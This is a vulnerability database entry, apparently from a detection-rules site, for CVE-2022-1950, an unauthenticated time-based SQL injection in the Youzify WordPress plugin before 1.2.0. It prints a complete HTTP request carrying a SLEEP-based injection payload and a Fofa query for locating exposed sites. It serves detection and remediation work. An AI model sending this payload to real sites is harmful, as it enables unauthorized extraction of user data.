🔙 목록으로 돌아가기

CVE-2022-1950: Youzify < 1.2.0 - Unauthenticated SQLi

TitleYouzify < 1.2.0 - Unauthenticated SQLi
AuthorDhiyaneshDK
SeverityCritical
ImpactUnauthenticated attackers can execute time-based blind SQL injection via AJAX actions to extract database contents, potentially exposing all Youzify media and user data.
RemediationFixed in 1.2.0
CVSS Score9.8
EPSS Score0.57136
CVE IDCVE-2022-1950
CWE IDCWE-89
Fofa Querybody="/wp-content/plugins/youzify"
Tags cve cve2022 youzify wp wp-plugin wordpress sqli time-based-sqli vkev vuln

🔍 Vulnerability Description

The Youzify WordPress plugin before 1.2.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection

🌐 HTTP Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Content-Length: 113
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=(SELECT 7958 FROM (SELECT(SLEEP(6)))XVfJ)

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1950.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1950.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A